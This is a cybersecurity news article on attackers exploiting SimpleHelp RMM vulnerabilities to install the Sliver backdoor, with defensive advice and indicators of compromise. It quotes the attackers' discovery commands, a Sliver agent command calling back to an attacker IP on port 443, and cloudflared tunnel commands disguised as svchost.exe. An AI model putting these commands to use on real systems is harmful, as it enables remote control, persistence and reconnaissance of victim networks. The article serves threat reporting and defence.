Cyber Security News

Hackers Exploiting SimpleHelp Vulnerabilities to Deploy Malware on Systems

Hackers have been exploiting vulnerabilities in the SimpleHelp remote management and monitoring (RMM) tool to deploy malware, including the Sliver backdoor, on compromised systems.

This attack highlights the importance of keeping software up to date and implementing robust security measures to prevent such exploits.

The attack begins with the threat actor connecting to the endpoint via the vulnerable SimpleHelp RMM client, known as JWrapper-Remote Access.

In one instance, the connection was made from the IP address 194.76.227[.]171, which is based in Estonia and hosts a SimpleHelp Server on port 80.

Data associated with IP 194.76.227[.]171 (Source – Field Effect)

Researchers at Field Effect discovered that once it connected, the threat actor executes a series of discovery commands to gather system details, user accounts, and network information.

These commands include:-

  • ipconfig /all
  • sc query
  • schtasks
  • driverquery
  • nltest /dclist:
  • nltest /domain_trusts
  • net share
  • net use
  • tasklist
  • findstr CSFalcon
  • quser
  • net group "domain admins" /domain
  • hostname
  • ping <DC_Hostname>

The attackers deploy the Sliver backdoor, a post-exploitation tool written in Go, which provides capabilities for process injection, service tampering, command execution, and file system manipulation. The backdoor is configured to connect to the IP address 45.9.148[.]136 on port 443 using the command:

agent.exe -connect 45.9.148[.]136:443 -ignore-cert
Data associated with IP 45.9.148[.]136 (Source – Field Effect)

Lateral Movement and Additional Payloads

In addition to deploying the Sliver backdoor, the attackers also installed a cloudflared tunnel, masquerading it as the legitimate Windows svchost.exe, to establish a secure, encrypted connection for further malicious activities. This was done using the command:

c:\Windows\svchost.exe svchost.exe service install (redacted Base64 encoded token)

Followed by:

c:\Windows\svchost.exe tunnel run --token (redacted Base64 encoded token)
Data associated with IP 45.9.149[.]112 (Source – Field Effect)

Organizations using SimpleHelp RMM can protect against these attacks by keeping SimpleHelp and all remote access tools updated.

Not only that even one can restrict the remote access to trusted IP ranges with multi-factor authentication, monitor network traffic and logs for malicious connections, and regularly reviewing administrative accounts for unauthorized additions.

By taking these steps, organizations can significantly reduce their vulnerability to such attacks and protect their systems from malicious exploitation.

Indicators of Compromise (IoCs)

  • IP addresses: 194.76.227[.]171, 45.9.148[.]136, 45.9.149[.]112
  • Hashes: 385a826b9f7e72b870a92f1901d9d354 (MD5), EC43ED845102760265ED6343EF1FCEF696588905 (SHA1), 15f3e5b47894b953542d2fe2353786229da47af00c96dc1b41a8efe631364e49 (SHA256)
  • JA3 Hash: d6828e30ab66774a91a96ae93be4ae4c

Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try for Free

Tushar Subhra Dutta

Tushar is a senior cybersecurity and breach reporter. He specializes in covering cybersecurity news, trends, and emerging threats, data breaches, and malware attacks. With years of experience, he brings clarity and depth to complex security topics.

Recent Posts

Hackers Target AI Infrastructure With RCE, Prompt Injection and API Key Theft

Hackers are actively probing AI systems, turning exposed gateways and agent tools into routes for…

3 hours ago

Hackers Make Phishing Pages Change Their Code Every Time Someone Opens Them

Hackers are making some phishing pages harder to track by changing the code delivered to…

3 hours ago

Iran-Linked Hackers Reportedly Knock UK Power Plant Offline for Four Days

A cyber incident reportedly forced a British power plant to halt operations for about four…

4 hours ago

Russian Hackers Use New HOOKEDGE Malware to Spy on European Defense and Diplomatic Targets

Russian hackers have used a new backdoor called HOOKEDGE to target defense manufacturers, government bodies,…

5 hours ago

Ransomware Gang Claims AI Can Analyze 700GB of Stolen Data Every Hour

TITAN ransomware is pairing file encryption with an ambitious claim: artificial intelligence that can sort…

5 hours ago

Hackers Compromise Hundreds of WordPress Sites to Deploy Amatera Stealer via ClickFix

A fake student resume is being used to place a remote-access tool on researchers’ Windows…

6 hours ago